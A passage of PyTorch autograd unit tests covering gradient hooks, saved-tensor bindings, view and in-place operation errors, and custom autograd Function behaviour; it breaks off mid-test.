    handle = param.register_hook(add_gradient_penalty_to_grad)
    # Forward pass
    tmp = (param * param)
    loss = tmp.sum()
    # Compute the gradients
    loss.backward()
def test_reentrant_with_non_leaf_variable_hook(self):
    """A hook on a non-leaf tensor may run a reentrant backward; the hook
    doubles the incoming gradient (g.grad == 2, so res = 2 + grad), giving
    param.grad == 6 * param for loss = (param * param).sum()."""
    handle = None
    param = torch.rand(10, requires_grad=True)

    def manual_increase_gradient(grad):
        # Remove immediately so the reentrant backward below does not
        # re-trigger this hook.
        handle.remove()
        # Add some sort of gradient penalty by directly updating the gradients
        with torch.enable_grad():
            g = grad.detach().requires_grad_()
            out = ((g * 2) + 5).sum()
            out.backward()
        res = g.grad + grad
        return res

    # Forward pass
    tmp = (param * param)
    handle = tmp.register_hook(manual_increase_gradient)
    loss = tmp.sum()
    # Compute the gradients
    loss.backward()
    self.assertEqual(param.grad, 6 * param)
def test_grad_fn_attr_bindings(self):
    """Smoke-test the codegen'd grad_fn attribute getters (`_saved_*` /
    `_raw_saved_*`): one representative op per C++ type, checking the
    Python type of the getter's result and the freed-after-backward errors.
    """
    # Check that the getter of each type returns what we want
    # See `gen_autograd_functions.py` for how the getters are generated
    #
    # This test is only meant to check if the codegen'd bindings work
    # Please help update this test if you update the names of any the fields we check!
    #
    a = torch.ones(1, requires_grad=True)
    b = torch.ones(1, requires_grad=True)
    out = torch.stack([a, b], dim=0)
    self.assertEqual(out.grad_fn._saved_tensors, (a, b))              # TensorList -> Tuple[Tensor]
    self.assertIsInstance(out.grad_fn._saved_tensors[0], torch.Tensor)
    self.assertIsInstance(out.grad_fn._raw_saved_tensors[0], torch._C._autograd.SavedTensor)
    self.assertEqual(out.grad_fn._saved_dim, 0)                       # int64_t -> int
    self.assertIsInstance(out.grad_fn._saved_dim, int)

    out.grad_fn._raw_saved_tensors[0].register_hooks(lambda x: x, lambda x: x)

    out.sum().backward()
    # Saved tensors are released after backward; accessing them must raise.
    with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
        out.grad_fn._saved_tensors
    with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
        out.grad_fn._raw_saved_tensors
    # Non-tensor saved values (the dim) survive the release.
    self.assertEqual(out.grad_fn._saved_dim, 0)

    a = torch.ones(2, 2, requires_grad=True)
    indices = torch.tensor([0, 1])
    out = a[:, indices]
    self.assertEqual(out.grad_fn._saved_indices, (None, indices))     # c10::List<c10::optional<Tensor>> -> Tuple[Tensor?]
    self.assertIsInstance(out.grad_fn._saved_indices[1], torch.Tensor)
    self.assertIsInstance(out.grad_fn._raw_saved_indices[1], torch._C._autograd.SavedTensor)
    self.assertEqual(out.grad_fn._saved_self_sizes, a.shape)          # IntArrayRef -> Tuple[int]
    self.assertIsInstance(out.grad_fn._saved_self_sizes[0], int)

    out.grad_fn._raw_saved_indices[1].register_hooks(lambda x: x, lambda x: x)
    with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
        out.grad_fn._raw_saved_indices[0].register_hooks(lambda x: x, lambda x: x)

    a = torch.ones(2, 2, requires_grad=True)
    out = a * a
    out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
    out.sum().backward()
    with self.assertRaisesRegex(RuntimeError, "after it has been freed"):
        out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)

    a = torch.ones(1, 1, 2, requires_grad=True)
    out = torch.nn.functional.interpolate(a, 4, mode="linear")
    self.assertEqual(out.grad_fn._saved_output_size, (4,))            # c10::optional<IntArrayRef> -> int[]?
    self.assertIsInstance(out.grad_fn._saved_output_size[0], int)
    self.assertEqual(out.grad_fn._saved_align_corners, False)         # bool -> bool
    self.assertIsInstance(out.grad_fn._saved_align_corners, bool)
    self.assertIsNone(out.grad_fn._saved_scale_factors)               # c10::optional<ArrayRef<double>> -> float[]?

    out = torch.nn.functional.interpolate(a, scale_factor=0.5, mode="linear")
    self.assertIsNone(out.grad_fn._saved_output_size)
    self.assertEqual(out.grad_fn._saved_scale_factors, (0.5,))
    self.assertIsInstance(out.grad_fn._saved_scale_factors[0], float)

    a = torch.ones(2, 2, requires_grad=True)
    out = torch.pdist(a, p=1)
    self.assertEqual(out.grad_fn._saved_p, 1.)                        # double -> float
    self.assertIsInstance(out.grad_fn._saved_p, float)

    a = torch.ones(1, 1, 2, requires_grad=True)
    out = torch.logit(a, 1.)
    self.assertEqual(out.grad_fn._saved_eps, 1.)                      # c10:optional<double> -> float?
    self.assertIsInstance(out.grad_fn._saved_eps, float)
    out = torch.logit(a)
    self.assertIsNone(out.grad_fn._saved_eps)

    if torch._C.has_lapack:
        a = torch.ones(1, 1, requires_grad=True)
        q, r = torch.linalg.qr(a, mode="reduced")
        self.assertEqual(q.grad_fn._saved_mode, "reduced")            # std::string -> str

    a = torch.tensor([1.], requires_grad=True)
    out = torch.div(a, 2., rounding_mode="trunc")
    self.assertEqual(out.grad_fn._saved_rounding_mode, "trunc")       # c10::optional<std::string> -> str?
    out = torch.div(a, 2., rounding_mode=None)
    self.assertIsNone(out.grad_fn._saved_rounding_mode)               # c10::optional<std::string> -> str?

    # Scalar: the saved Python type follows the Scalar's runtime tag.
    x = torch.zeros(5, requires_grad=True)
    out = torch.threshold(x, threshold=(1 + 0j), value=(1 + 0j))
    self.assertIsInstance(out.grad_fn._saved_threshold, complex)      # Scalar(complex double) -> complex
    cfloat = torch.tensor(1 + 0j, dtype=torch.complex64)
    out = torch.threshold(x, threshold=cfloat, value=(1 + 0j))
    self.assertIsInstance(out.grad_fn._saved_threshold, complex)      # Scalar(complex float) -> complex
    out = torch.threshold(x, threshold=1., value=1.)
    self.assertIsInstance(out.grad_fn._saved_threshold, float)        # Scalar(floating point) -> float
    out = torch.threshold(x, threshold=1, value=1)
    self.assertIsInstance(out.grad_fn._saved_threshold, int)          # Scalar(integral) -> int
    out = torch.threshold(x, threshold=False, value=False)
    self.assertIsInstance(out.grad_fn._saved_threshold, bool)         # Scalar(bool) -> bool

    a = torch.ones(2, 2, requires_grad=True)
    out = a.as_strided((3,), (1,), 1)
    self.assertEqual(out.grad_fn._saved_storage_offset, 1)            # c10:optional<int64_t> -> int?
    self.assertIsInstance(out.grad_fn._saved_storage_offset, int)
    out = a.as_strided((3,), (1,))
    self.assertIsNone(out.grad_fn._saved_storage_offset)

    a = torch.ones(2, requires_grad=True)
    out = torch.tanh(a)
    self.assertEqual(out, out.grad_fn._saved_result)  # saved variable when output

    a = torch.randn(3, 5, requires_grad=True)
    b = torch.tensor([1, 0, 4])
    loss = nn.NLLLoss()
    out = loss(a, b)
    self.assertIsNone(out.grad_fn._saved_weight)
    loss = nn.NLLLoss(weight=torch.ones((5,)))
    out = loss(a, b)
    self.assertEqual(out.grad_fn._saved_weight, torch.ones((5,)))     # c10:optional<Tensor> -> Tensor?

    out.sum().backward()
    with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
        out.grad_fn._saved_weight
def test_cant_create_saved_tensors(self):
with self.assertRaisesRegex(RuntimeError, "Trying to create a SavedTensor object from Python is forbidden"):
torch.autograd.SavedTensor()
def test_custom_function_saved_tensors(self):
    """Custom Function + save_for_backward: saved_tensors/_raw_saved_tensors
    bindings, register_hooks validation (None entries, arg checking, double
    registration), and the freed-after-backward errors."""
    def getFn(save=True):
        class MyFn(Function):
            @staticmethod
            def forward(ctx, x):
                if save:
                    # Deliberately saves a None alongside x.
                    ctx.save_for_backward(x, None)
                return x

            @staticmethod
            def backward(ctx, g):
                return g
        return MyFn

    a = torch.randn(5, requires_grad=True)

    y = getFn(True).apply(a)
    self.assertEqual((a, None), y.grad_fn.saved_tensors)
    saved = y.grad_fn._raw_saved_tensors
    self.assertIsInstance(saved[0], torch._C._autograd.SavedTensor)
    # We can't tell the underlying tensor is None without unpacking it
    self.assertIsInstance(saved[1], torch._C._autograd.SavedTensor)

    # We catch that error when the user calls register_hooks on it
    with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
        saved[1].register_hooks(lambda x: x, lambda x: x)

    with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
        saved[0].register_hooks(lambda x: x)
    with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
        saved[0].register_hooks(1, 1)
    saved[0].register_hooks(lambda x: x, lambda x: x)
    # Hooks may only be registered once per SavedTensor.
    with self.assertRaisesRegex(RuntimeError, "already been set"):
        saved[0].register_hooks(lambda x: x, lambda x: x)

    y.sum().backward()

    # Using a reference to the SavedTensor object after the
    # saved variables have been released can lead to undefined behavior
    del saved
    with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
        y.grad_fn._raw_saved_tensors
    with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
        y.grad_fn.saved_tensors

    # Nothing saved -> empty tuples, no errors.
    y = getFn(False).apply(a)
    self.assertEqual(y.grad_fn.saved_tensors, ())
    self.assertEqual(y.grad_fn._raw_saved_tensors, ())
def test_autograd_views_codegen(self):
    # This is not necessarily the absolute correct behavior, but this is the current
    # one. This test is here to make sure that any change to this behavior is detected
    # and not silent. The TODOs below mark the places with unexpected behavior.
    # Note that any change in these test will be BC-breaking and should be done carefully.

    # This test checks the behavior of two codegen functions (view_as and unbind)
    # with respect to view tracking and inplace operation on the output.
    def run_test(grad_mode, requires_grad, is_view, should_raise_tuple):
        def maybe_check_raise(fn, should_raise):
            self.assertTrue(should_raise is None or isinstance(should_raise, str))
            if should_raise is not None:
                with self.assertRaisesRegex(RuntimeError, should_raise):
                    fn()
            else:
                fn()

        # Single-output view op: view_as.
        inp = torch.rand(2, requires_grad=requires_grad).clone()
        with torch.set_grad_enabled(grad_mode):
            out = inp.view_as(inp)
        # Are they differentiable views?
        self.assertTrue(out._is_view() == is_view)
        # Are inplace allowed?
        maybe_check_raise(lambda: out.add_(1), should_raise_tuple[0])

        # Multi-output view op: unbind.
        inp = torch.rand(2, requires_grad=requires_grad).clone()
        with torch.set_grad_enabled(grad_mode):
            out = inp.unbind()
        # Are they differentiable views?
        self.assertTrue(out[0]._is_view() == is_view)
        self.assertTrue(out[1]._is_view() == is_view)
        # Are inplace allowed?
        maybe_check_raise(lambda: out[0].add_(1), should_raise_tuple[1])
        maybe_check_raise(lambda: out[1].add_(1), should_raise_tuple[2])

    # should_raise contains None if it should not raise
    # should_raise contains a string of the error if it should raise
    # The 3 elements are for view_as, first output of unbind and second output of unbind
    run_test(grad_mode=True, requires_grad=False, is_view=True,
             should_raise_tuple=(None, None, None))
    inp_change_err = "Output {} of UnbindBackward0 is a view and is being modified inplace."
    run_test(grad_mode=True, requires_grad=True, is_view=True,
             should_raise_tuple=(None, inp_change_err.format("0"), inp_change_err.format("1")))
    leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
    run_test(grad_mode=False, requires_grad=True, is_view=True,
             should_raise_tuple=(leaf_grad_err, leaf_grad_err, leaf_grad_err))
    run_test(grad_mode=False, requires_grad=False, is_view=True,
             should_raise_tuple=(None, None, None))
def test_inplace_not_requires_grad(self):
    """In-place writes of a grad-requiring tensor into a view of a
    non-grad-requiring base must raise for custom-Function views and
    multi-output views, while plain views (select) keep working.
    """
    class MyFn(torch.autograd.Function):
        # Identity that returns a *view* of its input
        @staticmethod
        def forward(ctx, inp):
            return inp.view_as(inp)

        @staticmethod
        def backward(ctx, grad):
            return grad

    # Original Tensor does not require grad
    a = torch.rand(1, 2)

    # Tensor being written does require grad
    b = torch.rand(1, requires_grad=True)

    # Take an invalid view on 'a' that should raise an error (warns during deprecation)
    view_a = MyFn.apply(a)

    with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
        view_a += b

    # Extra test for copy_ that is a manual implementation and could be easily
    # forgotten when the codegen is updated (warns during deprecation)
    a = torch.rand(1, 2)
    b = torch.rand(1, requires_grad=True)
    view_a = MyFn.apply(a)

    with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
        view_a.copy_(b)

    # Functions that should throw must properly throw
    a = torch.rand(1, 2)
    b = torch.rand(1, requires_grad=True)
    view_a = a.unbind()[0]
    with self.assertRaisesRegex(RuntimeError, "This view is the output of a function that returns "
                                              "multiple views."):
        view_a.copy_(b)

    # Sanity check that views that should work still work
    a = torch.rand(1, 2)
    b = torch.rand(1, requires_grad=True)
    a.select(1, 0).copy_(b)
def _do_test_autograd_simple_views_python(self, dtype):
    """Exercise custom autograd.Functions whose outputs may be views.

    For each of three Functions (single output, two outputs, view of a
    temporary), with and without in-place modification of the output and
    with and without the output being a real view, checks gradcheck,
    whether the custom backward runs (via the bw_called counter), and that
    invalid in-place-on-view combinations raise the expected error.

    :param dtype: dtype of the test inputs (called with double and cdouble).
    """
    # This is not necessarily the absolute correct behavior, but this is the current
    # one. This test is here to make sure that any change to this behavior is detected
    # and not silent. The TODOs below mark the places with unexpected behavior.
    # Note that any change in these test will be BC-breaking and should be done carefully.

    # This checks the autograd.Function behavior when we return one or multiple outputs
    # while one of these is an input, a view of an input or of a temporary tensor.

    # This indicator is used to track how many times the backward function was called
    bw_called = [0]
    # This indicator is used to check if the argument `ga` contains non-zero values
    ga_nz = [False]

    class IdOneOutput(Function):
        @staticmethod
        def forward(ctx, a, b, make_view):
            if make_view:
                a = a.narrow(0, 0, 2)
            else:
                a = a.clone()
            return a

        @staticmethod
        def backward(ctx, ga):
            bw_called[0] += 1
            return ga, None, None

    class IdTwoOutput(Function):
        @staticmethod
        def forward(ctx, a, b, make_view):
            if make_view:
                a = a.narrow(0, 0, 2)
            else:
                a = a.clone()
            return a, a + b

        @staticmethod
        def backward(ctx, ga, gab):
            bw_called[0] += 1
            if ga.eq(0).all():
                ga_nz[0] = False
            else:
                ga_nz[0] = True
            return ga + gab, gab, None

    class ViewOfTemp(Function):
        @staticmethod
        def forward(ctx, a, make_view):
            ctx.save_for_backward(a)
            if make_view:
                a = a.narrow(0, 0, 2)
            else:
                a = a.clone()
            b = a.clone()
            return b.select(0, 0)

        @staticmethod
        def backward(ctx, grad):
            bw_called[0] += 1
            a, = ctx.saved_tensors
            res = torch.zeros_like(a)
            res.select(0, 0).copy_(grad)
            return res, None

    fn_id_to_inplace_on_view_err_msg = {
        "one_output": ("Output 0 of IdOneOutputBackward is a view and is being "
                       "modified inplace. This view was created inside a custom Function"),
        "two_output": ("Output 0 of IdTwoOutputBackward is a view and is being modified inplace."
                       " This view is the output of a function that returns multiple views."),
        "view_of_temp": ("Output 0 of ViewOfTempBackward is a view and is being "
                         "modified inplace. This view was created inside a custom Function")
    }

    for fn_id in ["one_output", "two_output", "view_of_temp"]:
        for inplace in [True, False]:
            for make_view in [True, False]:
                # Used for special casing the tests below
                output_is_a_view = (make_view or fn_id == "view_of_temp")

                def fn(a, b):
                    # never modify a, b inplace for gracheck
                    a = a.clone()
                    b = b.clone()
                    if fn_id == "two_output":
                        tmp1, tmp2 = IdTwoOutput.apply(a, b, make_view)
                        if inplace:
                            tmp1 += 3
                            tmp2 += 3
                        else:
                            tmp1 = tmp1 + 3
                            tmp2 = tmp2 + 3
                        tmp = tmp1 * tmp2
                    else:
                        if fn_id == "one_output":
                            tmp = IdOneOutput.apply(a, b, make_view)
                        else:
                            tmp = ViewOfTemp.apply(a + b, make_view)
                        if inplace:
                            tmp += 3
                        else:
                            tmp = tmp + 3

                    return tmp.sum()

                a = torch.ones(2, dtype=dtype, requires_grad=True)
                b = torch.ones(2, dtype=dtype, requires_grad=True)

                err_msg = fn_id_to_inplace_on_view_err_msg[fn_id]

                if not inplace or not output_is_a_view:
                    gradcheck(fn, (a, b), check_batched_grad=False)

                # Was the custom backward called properly
                bw_called[0] = 0
                ga_nz[0] = True  # For the case where the backward is called
                if inplace and output_is_a_view:
                    with self.assertRaisesRegex(RuntimeError, err_msg):
                        fn(a, b)
                else:
                    fn(a, b).backward()

                expected_called = 1
                expected_ga_nz = True

                if output_is_a_view and inplace:
                    # the custom backward is replaced by the rewritten graph,
                    # so it is never invoked
                    expected_called = 0

                self.assertTrue(bw_called[0] == expected_called)
                self.assertTrue(ga_nz[0] == expected_ga_nz)
def test_autograd_simple_views_python(self):
    """Run the simple-views checks for both real and complex double precision."""
    for dtype in (torch.double, torch.cdouble):
        self._do_test_autograd_simple_views_python(dtype)
def test_autograd_inplace_views_creation_meta(self):
    """Check that creation_meta of a view survives in-place view ops.

    Creates a view (plain, multi-output, or custom-Function) under either
    grad mode, applies an in-place *view* op (t_, squeeze_, ...) under either
    grad mode, and verifies the expected error (or absence of error) both at
    the in-place view op and at a subsequent in-place modification.
    """
    # Tests creation_meta properly handled for inplace views

    class Func(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x):
            return x.view_as(x)

        @staticmethod
        def backward(ctx, x):
            return x
    view_custom = Func.apply

    def run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2):
        # This test checks the behavior of inplace-view functions when
        # the views are created in grad mode or not
        base = torch.rand(2, 3, requires_grad=requires_grad).clone()
        # 1. Create a view with `grad_mode=grad_mode_view`
        with torch.set_grad_enabled(grad_mode_view):
            if fn_type == "multi_view":
                inp = base.unbind()[0]
            elif fn_type == "custom" :
                inp = view_custom(base)
            else:
                inp = base.view_as(base)

        # 2. Perform inplace view with `grad_mode=grad_mode_iview`
        with torch.set_grad_enabled(grad_mode_iview):
            if error1 is not None:
                with self.assertRaisesRegex(RuntimeError, error1):
                    fn(inp)
                return
            else:
                # If error is None, check that runs without error
                fn(inp)
        # 3. Do inplace on the (new) view
        if error2 is not None:
            with self.assertRaisesRegex(RuntimeError, error2):
                inp.add_(1)
        else:
            # If error is None, check that runs without error
            inp.add_(1)

    no_grad_err = "A view was created in no_grad mode"
    multi_view_err = "function that returns multiple views"
    custom_err = "view was created inside a custom Function"

    def run_tests(fn):
        for fn_type in ("normal", "multi_view", "custom"):
            for grad_mode_view in (True, False):
                for grad_mode_iview in (True, False):
                    for requires_grad in (True, False):
                        error1 = None  # expected error when we do inplace_view on original view
                        error2 = None  # expected error when we do inplace on the resulting view

                        if requires_grad:
                            if not grad_mode_view and grad_mode_iview:
                                error1 = no_grad_err
                            if not grad_mode_view and not grad_mode_iview:
                                error2 = no_grad_err

                            if fn_type == "multi_view":
                                if grad_mode_view and grad_mode_iview:
                                    error1 = multi_view_err
                                if grad_mode_view and not grad_mode_iview:
                                    error2 = multi_view_err

                            if fn_type == "custom":
                                if grad_mode_view and grad_mode_iview:
                                    error1 = custom_err
                                if grad_mode_view and not grad_mode_iview:
                                    error2 = custom_err

                        run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2)

    # This list was created by logging gen_inplace_or_view_type.py
    # detach_ is excluded for this test because it cannot be applied to
    # views and thus does not return a view
    run_tests(lambda v: v.as_strided_((1, 0), (2, 2)))
    run_tests(lambda v: v.transpose_(0, 0))
    run_tests(lambda v: v.t_())
    run_tests(lambda v: v.squeeze_(0))
    run_tests(lambda v: v.unsqueeze_(0))
    run_tests(lambda v: v.swapdims_(0, 0))
    run_tests(lambda v: v.swapaxes_(0, 0))
# TODO This is not the correct behavior -
# See https://github.com/pytorch/pytorch/issues/49825#issuecomment-794466627
def test_autograd_inplace_views_cross_dtype(self):
    """Pin the (known-buggy) gradient of an in-place transpose on a
    cross-dtype view (view_as_real of a complex tensor): the in-place
    variant currently produces the transposed gradient.
    """
    # This test is here to make sure that any change to this behavior is detected
    # and not silent. The TODOs below mark the places with unexpected behavior.
    a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
    a = a_orig.clone()
    b = torch.view_as_real(a)
    b = b.transpose(0, 1)  # out-of-place transpose: reference behavior
    b += 1
    b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
    non_inplace_grad = a_orig.grad

    a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
    a = a_orig.clone()
    b = torch.view_as_real(a)
    b.transpose_(0, 1)  # in-place transpose: currently yields a transposed grad
    b += 1
    b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
    inplace_grad = a_orig.grad

    # TODO: this is a bug!
    # once this is fixed, it should have the transpose removed:
    # self.assertEqual(non_inplace_grad, inplace_grad)
    self.assertEqual(non_inplace_grad.T, inplace_grad)
def test_autograd_multiple_views_python(self):
    """Custom Function creating several views internally: the custom
    backward runs on plain backward, and in-place modification of the
    returned view raises.
    """
    # This is not necessarily the absolute correct behavior, but this is the current
    # one. This test is here to make sure that any change to this behavior is detected
    # and not silent. The TODOs below mark the places with unexpected behavior.
    # Note that any change in these test will be BC-breaking and should be done carefully.

    # This checks that multiples views in the forward are properly traced and how they
    # behave with respect to inplace operations.

    # This indicator is used to track how many times the backward function was called
    bw_called = [0]

    class ComplexView(Function):
        @staticmethod
        def forward(ctx, a, idx):
            # two chained view ops; only the select result is returned
            res = a.narrow(0, idx, 1)
            res = a.select(0, idx)
            ctx.save_for_backward(a)
            ctx.idx = idx
            return res

        @staticmethod
        def backward(ctx, grad):
            bw_called[0] += 1
            a, = ctx.saved_tensors
            res = torch.zeros_like(a)
            res.select(0, ctx.idx).copy_(grad)
            return res, None

    a = torch.ones(2, requires_grad=True)
    idx = 1

    bw_called[0] = 0
    out = ComplexView.apply(a.clone(), idx)
    out.sum().backward()
    self.assertTrue(bw_called[0] == 1)

    out = ComplexView.apply(a.clone(), idx)
    with self.assertRaisesRegex(RuntimeError,
                                "Output 0 of ComplexViewBackward is a view and is being modified inplace"):
        out += 1
def test_autograd_python_custom_function_inplace(self):
    """Custom autograd.Functions performing in-place ops on their inputs.

    Covers: correct use of ctx.mark_dirty on an input (single and multiple
    outputs), the warning when marking a non-input dirty, the error when the
    dirtied input is a view, and the error when a dirtied tensor is not
    returned as an output.
    """
    # This is not necessarily the absolute correct behavior, but this is the current
    # one. This test is here to make sure that any change to this behavior is detected
    # and not silent. The TODOs below mark the places with unexpected behavior.
    # Note that any change in these test will be BC-breaking and should be done carefully.

    # This test checks custom autograd.Function that perform inplace operations

    bw_called = [0]

    # I) Single output
    class MyAdder(Function):
        @staticmethod
        def forward(ctx, a, b):
            a.add_(b)
            ctx.mark_dirty(a)
            return a

        @staticmethod
        def backward(ctx, grad):
            bw_called[0] += 1
            return grad, grad

    a = torch.ones(2, requires_grad=True)
    b = torch.ones(2, requires_grad=True)

    # No extra inplace
    c = MyAdder.apply(a.clone(), b)
    c.sum().backward()
    self.assertTrue(bw_called[0] == 1)

    # With extra inplace on the output
    bw_called[0] = 0
    c = MyAdder.apply(a.clone(), b)
    c += 2
    c.sum().backward()
    self.assertTrue(bw_called[0] == 1)

    # The input is a view
    bw_called[0] = 0
    c = MyAdder.apply(a.clone().view_as(a), b)
    c.sum().backward()
    self.assertTrue(bw_called[0] == 1)

    # Should not give non-inputs to mark_dirty
    class MyAdderBad(Function):
        @staticmethod
        def forward(ctx, a, b):
            c = 3 * a
            c.add_(b)
            ctx.mark_dirty(c)
            return c

        @staticmethod
        def backward(ctx, grad):
            bw_called[0] += 1
            grad = 3 * grad
            return grad, grad

    a = torch.ones(2, requires_grad=True)
    b = torch.ones(2, requires_grad=True)

    with warnings.catch_warnings(record=True) as w:
        MyAdderBad.apply(a.clone(), b)
    self.assertEqual(len(w), 1)

    # II) Multiple outputs
    class MyBadAdder(Function):
        @staticmethod
        def forward(ctx, a, b):
            a.add_(b)
            ctx.mark_dirty(a)
            return a, a + b

        @staticmethod
        def backward(ctx, ga, gab):
            bw_called[0] += 1
            return ga + gab, ga + gab

    # No extra inplace
    bw_called[0] = 0
    c, d = MyBadAdder.apply(a.clone(), b)
    (c * d).sum().backward()
    self.assertTrue(bw_called[0] == 1)

    # With extra inplace on the output
    bw_called[0] = 0
    c, d = MyBadAdder.apply(a.clone(), b)
    c += 2
    (c * d).sum().backward()
    self.assertTrue(bw_called[0] == 1)

    # The input is a view
    inplace_on_view_err = "your Function modifies inplace an input that is a view of another Tensor"
    with self.assertRaisesRegex(RuntimeError, inplace_on_view_err):
        c, d = MyBadAdder.apply(a.clone().view_as(a), b)

    # III) Inplace + other op
    class MyOutPlaceAdder(Function):
        @staticmethod
        def forward(ctx, a, b):
            a.add_(b)
            ctx.mark_dirty(a)
            # dirtied `a` is NOT returned — only a clone of it
            return a.clone(), a + b

        @staticmethod
        def backward(ctx, ga, gab):
            bw_called[0] += 1
            return ga + gab, ga + 2 * gab

    # We don't reuse the input
    def fn(a, b):
        orig_a = a.clone().view_as(a)
        c, d = MyOutPlaceAdder.apply(orig_a, b)
        return (c * d).sum()

    bad_mark_dirty_err = "Some elements marked as dirty during the forward method were not returned as output."
    with self.assertRaisesRegex(RuntimeError, bad_mark_dirty_err):
        fn(a, b)
def test_named_tensor_for_complex_views(self):
    """Backward through view_as_complex of a named tensor fills the real
    base's .grad with the real view of a ones-like complex gradient."""
    dim_names = ["batch", "height", "width", "complex"]
    real_base = torch.ones((5, 12, 14, 2), requires_grad=True)
    named = real_base.refine_names(*dim_names)
    # Drop names around view_as_complex, then restore all but the last dim
    as_complex = torch.view_as_complex(named.rename(None)).refine_names(*dim_names[:-1])
    as_complex.sum().backward()
    expected_grad = torch.view_as_real(torch.ones_like(as_complex).rename(None))
    self.assertEqual(real_base.grad, expected_grad)
def test_custom_function_return_view_in_nograd(self):
    """A custom Function returning a view under no_grad behaves like the
    equivalent built-in op: same requires_grad, and in-place modification
    of the no_grad-created view raises."""
    class Alias(Function):
        @staticmethod
        def forward(ctx, x):
            return x[:]

        @staticmethod
        def backward(ctx, gx):
            return gx

    inp = torch.rand(2, requires_grad=True)

    with torch.no_grad():
        output = Alias.apply(inp)

    with torch.no_grad():
        expected_output = inp[:]

    # Calling the custom function should operate as if we called an equivalent op
    self.assertEqual(output.requires_grad, expected_output.requires_grad)

    # Check that in-place modification on view throws
    leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
    with self.assertRaisesRegex(RuntimeError, leaf_grad_err):
        output.zero_()
def test_grad_mode_restored_reentrant(self):
    """Grad mode is restored after a reentrant backward: inside a custom
    backward, enable_grad works and the original grad mode is back once the
    context exits — for both original==False (plain backward) and
    original==True (backward with create_graph=True)."""
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, inp):
            return inp.clone()

        @staticmethod
        def backward(ctx, go):
            original = torch._C.is_grad_enabled()
            with torch.enable_grad():
                self.assertTrue(torch._C.is_grad_enabled())
                foo = torch.rand(go.size(), requires_grad=True)
                # reentrant autograd call inside backward
                grad, = torch.autograd.grad(
                    foo ** 3, foo, grad_outputs=go
                )
                self.assertTrue(torch._C.is_grad_enabled())
            self.assertTrue(torch._C.is_grad_enabled() == original)
            return grad

    inp = torch.rand(3, requires_grad=True)

    # Case where original==False
    MyFunction.apply(inp).sum().backward()
    # Case where original==True
    MyFunction.apply(inp).sum().backward(create_graph=True)
def test_power_function(self):
    """Gradient of base ** exponent at base == 0: d/db(0**b) is -inf for
    b = -1 and 0 for b in {0, 1}, for both tensor and Python-scalar bases."""
    expected_grad = torch.tensor([-inf, 0., 0.])
    for base in (torch.tensor([0., 0., 0.]), 0):
        exponent = torch.tensor([-1., 0., 1.], requires_grad=True)
        torch.sum(base ** exponent).backward()
        self.assertEqual(exponent.grad, expected_grad)
def test_custom_function_error(self):
    """Misconfigured custom Functions raise the right errors: missing
    forward, missing backward/vjp, both backward and vjp defined, and
    missing jvp under forward-mode AD."""
    class BadFw(Function):
        # no forward defined
        @staticmethod
        def backward(ctx, foo):
            return foo

    class BadBw(Function):
        # no backward/vjp defined
        @staticmethod
        def forward(ctx, foo):
            return foo.clone()

    class BadBw2(Function):
        # both backward AND vjp defined — ambiguous
        @staticmethod
        def forward(ctx, foo):
            return foo.clone()

        @staticmethod
        def backward(ctx, foo):
            return foo

        @staticmethod
        def vjp(ctx, foo):
            return foo

    class BadJvp(Function):
        # no jvp defined — fails under forward-mode AD
        @staticmethod
        def forward(ctx, foo):
            return foo.clone()

    inp = torch.rand(1, requires_grad=True)
    with self.assertRaisesRegex(NotImplementedError, "must implement the forward"):
        BadFw.apply(inp)

    with self.assertRaisesRegex(RuntimeError, "must implement either the backward"):
        BadBw.apply(inp).sum().backward()

    with self.assertRaisesRegex(RuntimeError, "Implementing both 'backward' and 'vjp'"):
        BadBw2.apply(inp).sum().backward()

    with self.assertRaisesRegex(RuntimeError, "must implement the jvp function"):
        with fwAD.dual_level():
            d = fwAD.make_dual(inp, torch.rand_like(inp))
            res = BadJvp.apply(d)
def test_custom_function_forward_mode_view_checks(self):
    """Forward-mode AD of a view-returning custom Function: the jvp must
    return a view of the input tangent with the same base; each way of
    breaking that produces its own error under gradcheck."""
    # flag value -> expected gradcheck error (None == must pass)
    flag_to_error = {
        "ok": None,
        "not_a_view": "jvp is not returning a view",
        "not_a_view_of_inp": "jvp is not returning a view of the given",
        "not_a_view_of_inp_base": "jvp is not returning a view of the same base",
    }

    class ViewFn(Function):
        @staticmethod
        def forward(ctx, foo, flag):
            ctx.flag = flag
            ctx.size = foo.size()
            return foo.narrow(0, 0, 2)

        @staticmethod
        def vjp(ctx, gO):
            gI = gO.new_zeros(ctx.size)
            gI.narrow(0, 0, 2).copy_(gO)
            return gI, None

        @staticmethod
        def jvp(ctx, gI, _):
            res = gI.narrow(0, 0, 2)
            if ctx.flag != "ok":
                # Break the view in the gradients!
                res = res.clone()
            if ctx.flag in ["not_a_view_of_inp", "not_a_view_of_inp_base"]:
                # Result should be a view, just of the wrong thing
                res = res.view_as(res)
            return res

    inp = torch.rand(4, 4, dtype=torch.double, requires_grad=True)

    for flag, msg in flag_to_error.items():
        def test_fn(inp):
            if flag == "not_a_view_of_inp_base":
                # make the traced input itself a view so its base differs
                inp = inp.view_as(inp)
            return ViewFn.apply(inp, flag)

        if msg is None:
            gradcheck(test_fn, inp, check_forward_ad=True)
        else:
            with self.assertRaisesRegex(RuntimeError, msg):
